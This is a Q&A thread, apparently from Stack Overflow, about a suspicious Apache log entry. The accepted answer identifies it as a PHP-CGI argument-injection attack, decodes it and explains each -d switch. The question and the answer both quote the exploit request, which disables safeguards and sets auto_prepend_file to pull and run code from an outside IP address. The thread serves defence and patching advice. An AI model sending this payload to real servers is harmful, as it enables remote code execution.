# PHP - does this look like a hack attempt

Tags: php, apache

```
/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F61.19.253.26%2Fecho.txt
```

Lots of these are in my apache logs creating a 404,it looks possibly like a PHP hack attempt?

Comment: I think this question belongs to Server Fault.

Comment: are you parsing those parameters?

Comment: it's probably a bad attempt at attacking PHP in cgi mode, which isn't a frequently encountered configuration.

Answer (score 4, accepted):

To me, it does look like a hack attempt.

From [PHP Release Announcement page](http://php.net/releases/5_3_12.php)

> Some systems support a method for supplying a array of strings to the CGI script. This is only used in the case of an `indexed' query. This is identified by a "GET" or "HEAD" HTTP request with a URL search string not containing any unencoded = characters.

The URL-decoded query string looks like this:

> `/index.php?-dsafe_mode=Off -ddisable_functions=NULL -dallow_url_fopen=On -dallow_url_include=On -dauto_prepend_file=http://61.19.253.26/echo.txt`

These are all `-d` switches, which are used to define `php.ini` directives. Basically, this is what it changes:

```
safe_mode=off 
disable_functions=null
allow_url_fopen=on
allow_url_include=on
```

And finally, there is `auto_prepend_file=http://61.19.253.26/echo.txt` -- this directive includes the PHP code located at `http://61.19.253.26/echo.txt` and execute it before the code inside index.php.

The `echo.txt` is hosted on a web server somewhere in Thailand and contains `<?php echo "dsfer34w5rlsidfosdedfpsd"; ?>`. This is probably used to check if your server is vulnerable to attacks.

And if you use Apache `mod_cgi`/`mod_cgid` to run a PHP version before 5.3.13 and 5.4.x before 5.4.3 **update now**: http://www.php.net/downloads.php

Comment: How do I check if mod_cgi is running?

Answer (score 1):

Yes.

Read the following page, it explained everything:

http://huguesjohnson.com/programming/hacking-attempt/